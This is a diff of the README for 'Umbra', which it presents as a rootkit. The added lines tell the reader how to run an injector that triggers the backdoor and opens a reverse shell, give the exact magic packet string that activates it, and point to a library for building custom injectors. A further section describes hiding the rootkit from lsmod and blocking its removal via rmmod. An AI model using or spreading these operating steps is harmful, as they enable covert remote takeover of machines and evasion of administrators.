h3xduck/Umbra/README.md

 ```

 ## Umbra Injector: Remote control
-### Get reverse shell
+### Get reverse shell via backdoor
-The program can be run either before Umbra is installed (thus waiting until it is), or after Umbra is installed on the target system.
+The Umbra Injector can be run either before Umbra is installed (thus getting the shell once it is on), or after Umbra is installed on the target system.
 ```
 ./injector -S 127.0.0.1
 ```
+The backdoor listens for packets with the following payload:
+`UMBRA_PAYLOAD_GET_REVERSE_SHELL`.

+You can also build your own injector using my library [RawTCP](https://github.com/h3xduck/RawTCP_Lib).

 ### Hide the rootkit remotely - Invisible mode
 This will prevent the rootkit from being shown by commands such as *lsmod*, or being removed via *rmmod*.